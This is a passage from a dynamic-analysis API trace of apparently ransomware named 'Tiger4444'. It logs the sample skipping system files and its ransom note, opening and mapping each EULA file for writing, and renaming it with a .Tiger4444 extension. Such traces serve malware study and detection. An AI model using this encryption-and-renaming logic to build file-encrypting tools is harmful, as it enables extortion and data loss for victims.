(lpString1="EULA_sv-se.htm", lpString2="Tiger4444.exe") returned -1 [0044.257] lstrcmpiW (lpString1="EULA_sv-se.htm", lpString2=".") returned 1 [0044.257] lstrcmpiW (lpString1="EULA_sv-se.htm", lpString2="..") returned 1 [0044.257] lstrcmpiW (lpString1="EULA_sv-se.htm", lpString2="windows") returned -1 [0044.257] lstrcmpiW (lpString1="EULA_sv-se.htm", lpString2="bootmgr") returned 1 [0044.257] lstrcmpiW (lpString1="EULA_sv-se.htm", lpString2="pagefile.sys") returned -1 [0044.257] lstrcmpiW (lpString1="EULA_sv-se.htm", lpString2="boot") returned 1 [0044.257] lstrcmpiW (lpString1="EULA_sv-se.htm", lpString2="ids.txt") returned -1 [0044.257] lstrcmpiW (lpString1="EULA_sv-se.htm", lpString2="NTUSER.DAT") returned -1 [0044.257] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_sv-se.htm" | out: lpString1="EULA_sv-se.htm") returned="EULA_sv-se.htm" [0044.258] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sv-se.htm", dwFileAttributes=0x0) returned 1 [0044.260] lstrlenW (lpString="EULA_sv-se.htm") returned 14 [0044.260] lstrlenW (lpString="Tiger4444") returned 9 [0044.260] lstrcmpiW (lpString1="sv-se.htm", lpString2="Tiger4444") returned -1 [0044.260] lstrlenW (lpString=".dll") returned 4 [0044.260] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0044.260] lstrlenW (lpString=".lnk") returned 4 [0044.261] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0044.261] lstrlenW (lpString=".ini") returned 4 [0044.261] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0044.261] lstrlenW (lpString=".sys") returned 4 [0044.261] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0044.261] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sv-se.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sv-se.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.261] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0044.261] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13571389229) returned 1 [0044.261] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=70391) returned 1 [0044.261] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89860 [0044.261] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc718c8 [0044.261] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11600, lpName=0x0) returned 0x2c8 [0044.262] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11600) returned 0xbe0000 [0044.265] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0044.265] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0044.265] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0044.265] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0044.265] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0044.266] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0044.266] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0044.266] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0044.266] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13571877335) returned 1 [0044.266] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89860 | out: hHeap=0xc50000) returned 1 [0044.266] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc718c8 | out: hHeap=0xc50000) returned 1 [0044.266] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.267] CloseHandle (hObject=0x2c8) returned 1 [0044.267] CloseHandle (hObject=0x260) returned 1 [0044.269] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sv-se.htm.Tiger4444") returned 62 [0044.269] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sv-se.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sv-se.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sv-se.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sv-se.htm.tiger4444"), dwFlags=0x1) returned 1 [0044.270] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=70400 | out: Addend=0xc6f980) returned 13939984 [0044.270] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=4 | out: Addend=0xc6f98c) returned 4173 [0044.270] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5e364e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5e364e, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x3e0c1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_th-th.htm", cAlternateFileName="EULA_T~1.HTM")) returned 1 [0044.270] lstrcmpiW (lpString1="EULA_th-th.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.270] lstrcmpiW (lpString1="EULA_th-th.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.270] lstrcmpiW (lpString1="EULA_th-th.htm", lpString2="Tiger4444.exe") returned -1 [0044.270] lstrcmpiW (lpString1="EULA_th-th.htm", lpString2=".") returned 1 [0044.270] lstrcmpiW (lpString1="EULA_th-th.htm", lpString2="..") returned 1 [0044.270] lstrcmpiW (lpString1="EULA_th-th.htm", lpString2="windows") returned -1 [0044.270] lstrcmpiW (lpString1="EULA_th-th.htm", lpString2="bootmgr") returned 1 [0044.270] lstrcmpiW (lpString1="EULA_th-th.htm", lpString2="pagefile.sys") returned -1 [0044.270] lstrcmpiW (lpString1="EULA_th-th.htm", lpString2="boot") returned 1 [0044.270] lstrcmpiW (lpString1="EULA_th-th.htm", lpString2="ids.txt") returned -1 [0044.270] lstrcmpiW (lpString1="EULA_th-th.htm", lpString2="NTUSER.DAT") returned -1 [0044.270] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_th-th.htm" | out: lpString1="EULA_th-th.htm") returned="EULA_th-th.htm" [0044.270] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_th-th.htm", dwFileAttributes=0x0) returned 1 [0044.271] lstrlenW (lpString="EULA_th-th.htm") returned 14 [0044.271] lstrlenW (lpString="Tiger4444") returned 9 [0044.271] lstrcmpiW (lpString1="th-th.htm", lpString2="Tiger4444") returned -1 [0044.271] lstrlenW (lpString=".dll") returned 4 [0044.271] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0044.271] lstrlenW (lpString=".lnk") returned 4 [0044.271] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0044.271] lstrlenW (lpString=".ini") returned 4 [0044.271] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0044.271] lstrlenW (lpString=".sys") returned 4 [0044.271] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0044.271] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_th-th.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_th-th.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.271] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0044.271] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13572415940) returned 1 [0044.271] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=254145) returned 1 [0044.271] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89680 [0044.271] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71bf8 [0044.271] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3e3d0, lpName=0x0) returned 0x2c8 [0044.272] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3e3d0) returned 0xbe0000 [0044.281] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0044.281] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0044.281] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0044.281] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0044.281] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0044.281] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0044.281] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0044.281] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0044.281] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13573407609) returned 1 [0044.281] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0044.281] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71bf8 | out: hHeap=0xc50000) returned 1 [0044.281] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.283] CloseHandle (hObject=0x2c8) returned 1 [0044.283] CloseHandle (hObject=0x260) returned 1 [0044.288] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_th-th.htm.Tiger4444") returned 62 [0044.288] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_th-th.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_th-th.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_th-th.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_th-th.htm.tiger4444"), dwFlags=0x1) returned 1 [0044.289] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=254160 | out: Addend=0xc6f980) returned 14010384 [0044.289] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=9 | out: Addend=0xc6f98c) returned 4177 [0044.289] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5ed27d, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5ed27d, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x12581, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_tr-tr.htm", cAlternateFileName="EULA_T~2.HTM")) returned 1 [0044.289] lstrcmpiW (lpString1="EULA_tr-tr.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.289] lstrcmpiW (lpString1="EULA_tr-tr.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.289] lstrcmpiW (lpString1="EULA_tr-tr.htm", lpString2="Tiger4444.exe") returned -1 [0044.289] lstrcmpiW (lpString1="EULA_tr-tr.htm", lpString2=".") returned 1 [0044.289] lstrcmpiW (lpString1="EULA_tr-tr.htm", lpString2="..") returned 1 [0044.289] lstrcmpiW (lpString1="EULA_tr-tr.htm", lpString2="windows") returned -1 [0044.289] lstrcmpiW (lpString1="EULA_tr-tr.htm", lpString2="bootmgr") returned 1 [0044.289] lstrcmpiW (lpString1="EULA_tr-tr.htm", lpString2="pagefile.sys") returned -1 [0044.289] lstrcmpiW (lpString1="EULA_tr-tr.htm", lpString2="boot") returned 1 [0044.289] lstrcmpiW (lpString1="EULA_tr-tr.htm", lpString2="ids.txt") returned -1 [0044.289] lstrcmpiW (lpString1="EULA_tr-tr.htm", lpString2="NTUSER.DAT") returned -1 [0044.289] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_tr-tr.htm" | out: lpString1="EULA_tr-tr.htm") returned="EULA_tr-tr.htm" [0044.289] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_tr-tr.htm", dwFileAttributes=0x0) returned 1 [0044.290] lstrlenW (lpString="EULA_tr-tr.htm") returned 14 [0044.290] lstrlenW (lpString="Tiger4444") returned 9 [0044.290] lstrcmpiW (lpString1="tr-tr.htm", lpString2="Tiger4444") returned 1 [0044.290] lstrlenW (lpString=".dll") returned 4 [0044.290] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0044.290] lstrlenW (lpString=".lnk") returned 4 [0044.290] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0044.290] lstrlenW (lpString=".ini") returned 4 [0044.290] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0044.290] lstrlenW (lpString=".sys") returned 4 [0044.290] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0044.290] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_tr-tr.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_tr-tr.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.290] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0044.290] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13574314580) returned 1 [0044.290] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=75137) returned 1 [0044.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0044.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71f28 [0044.290] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12890, lpName=0x0) returned 0x2c8 [0044.291] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12890) returned 0xbe0000 [0044.295] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0044.295] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0044.295] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0044.295] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0044.295] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0044.295] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0044.295] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0044.295] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0044.296] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13574863825) returned 1 [0044.296] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0044.296] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71f28 | out: hHeap=0xc50000) returned 1 [0044.296] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.296] CloseHandle (hObject=0x2c8) returned 1 [0044.296] CloseHandle (hObject=0x260) returned 1 [0044.299] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_tr-tr.htm.Tiger4444") returned 62 [0044.299] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_tr-tr.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_tr-tr.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_tr-tr.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_tr-tr.htm.tiger4444"), dwFlags=0x1) returned 1 [0044.299] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=75152 | out: Addend=0xc6f980) returned 14264544 [0044.299] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=5 | out: Addend=0xc6f98c) returned 4186 [0044.299] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5ed27d, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5ed27d, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x411eb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_uk-ua.htm", cAlternateFileName="EULA_U~1.HTM")) returned 1 [0044.299] lstrcmpiW (lpString1="EULA_uk-ua.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.299] lstrcmpiW (lpString1="EULA_uk-ua.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.299] lstrcmpiW (lpString1="EULA_uk-ua.htm", lpString2="Tiger4444.exe") returned -1 [0044.299] lstrcmpiW (lpString1="EULA_uk-ua.htm", lpString2=".") returned 1 [0044.299] lstrcmpiW (lpString1="EULA_uk-ua.htm", lpString2="..") returned 1 [0044.299] lstrcmpiW (lpString1="EULA_uk-ua.htm", lpString2="windows") returned -1 [0044.300] lstrcmpiW (lpString1="EULA_uk-ua.htm", lpString2="bootmgr") returned 1 [0044.300] lstrcmpiW (lpString1="EULA_uk-ua.htm", lpString2="pagefile.sys") returned -1 [0044.300] lstrcmpiW (lpString1="EULA_uk-ua.htm", lpString2="boot") returned 1 [0044.300] lstrcmpiW (lpString1="EULA_uk-ua.htm", lpString2="ids.txt") returned -1 [0044.300] lstrcmpiW (lpString1="EULA_uk-ua.htm", lpString2="NTUSER.DAT") returned -1 [0044.300] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_uk-ua.htm" | out: lpString1="EULA_uk-ua.htm") returned="EULA_uk-ua.htm" [0044.300] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_uk-ua.htm", dwFileAttributes=0x0) returned 1 [0044.301] lstrlenW (lpString="EULA_uk-ua.htm") returned 14 [0044.301] lstrlenW (lpString="Tiger4444") returned 9 [0044.301] lstrcmpiW (lpString1="uk-ua.htm", lpString2="Tiger4444") returned 1 [0044.301] lstrlenW (lpString=".dll") returned 4 [0044.301] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0044.301] lstrlenW (lpString=".lnk") returned 4 [0044.301] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0044.301] lstrlenW (lpString=".ini") returned 4 [0044.301] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0044.301] lstrlenW (lpString=".sys") returned 4 [0044.301] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0044.301] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_uk-ua.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_uk-ua.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.301] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0044.301] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13575405373) returned 1 [0044.301] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=266731) returned 1 [0044.301] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ba8 [0044.301] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71840 [0044.301] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x414f0, lpName=0x0) returned 0x2c8 [0044.302] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x414f0) returned 0xbe0000 [0044.310] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0044.310] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0044.310] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0044.310] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0044.310] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0044.310] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0044.310] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0044.310] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0044.310] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13576315975) returned 1 [0044.310] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ba8 | out: hHeap=0xc50000) returned 1 [0044.310] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71840 | out: hHeap=0xc50000) returned 1 [0044.310] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.313] CloseHandle (hObject=0x2c8) returned 1 [0044.313] CloseHandle (hObject=0x260) returned 1 [0044.318] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_uk-ua.htm.Tiger4444") returned 62 [0044.318] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_uk-ua.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_uk-ua.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_uk-ua.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_uk-ua.htm.tiger4444"), dwFlags=0x1) returned 1 [0044.319] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=266736 | out: Addend=0xc6f980) returned 14339696 [0044.319] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=9 | out: Addend=0xc6f98c) returned 4191 [0044.319] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5ed27d, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5ed27d, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x1ed21, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_zh-cn.htm", cAlternateFileName="EULA_Z~1.HTM")) returned 1 [0044.319] lstrcmpiW (lpString1="EULA_zh-cn.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.319] lstrcmpiW (lpString1="EULA_zh-cn.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.319] lstrcmpiW (lpString1="EULA_zh-cn.htm", lpString2="Tiger4444.exe") returned -1 [0044.319] lstrcmpiW (lpString1="EULA_zh-cn.htm", lpString2=".") returned 1 [0044.319] lstrcmpiW (lpString1="EULA_zh-cn.htm", lpString2="..") returned 1 [0044.319] lstrcmpiW (lpString1="EULA_zh-cn.htm", lpString2="windows") returned -1 [0044.319] lstrcmpiW (lpString1="EULA_zh-cn.htm", lpString2="bootmgr") returned 1 [0044.319] lstrcmpiW (lpString1="EULA_zh-cn.htm", lpString2="pagefile.sys") returned -1 [0044.319] lstrcmpiW (lpString1="EULA_zh-cn.htm", lpString2="boot") returned 1 [0044.319] lstrcmpiW (lpString1="EULA_zh-cn.htm", lpString2="ids.txt") returned -1 [0044.319] lstrcmpiW (lpString1="EULA_zh-cn.htm", lpString2="NTUSER.DAT") returned -1 [0044.319] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_zh-cn.htm" | out: lpString1="EULA_zh-cn.htm") returned="EULA_zh-cn.htm" [0044.319] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-cn.htm", dwFileAttributes=0x0) returned 1 [0044.320] lstrlenW (lpString="EULA_zh-cn.htm") returned 14 [0044.320] lstrlenW (lpString="Tiger4444") returned 9 [0044.320] lstrcmpiW (lpString1="zh-cn.htm", lpString2="Tiger4444") returned 1 [0044.320] lstrlenW (lpString=".dll") returned 4 [0044.320] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0044.320] lstrlenW (lpString=".lnk") returned 4 [0044.320] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0044.320] lstrlenW (lpString=".ini") returned 4 [0044.320] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0044.320] lstrlenW (lpString=".sys") returned 4 [0044.320] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0044.320] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-cn.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_zh-cn.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.320] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0044.320] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13577325019) returned 1 [0044.320] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=126241) returned 1 [0044.320] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ab8 [0044.320] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71fb0 [0044.320] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1f030, lpName=0x0) returned 0x2c8 [0044.321] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, 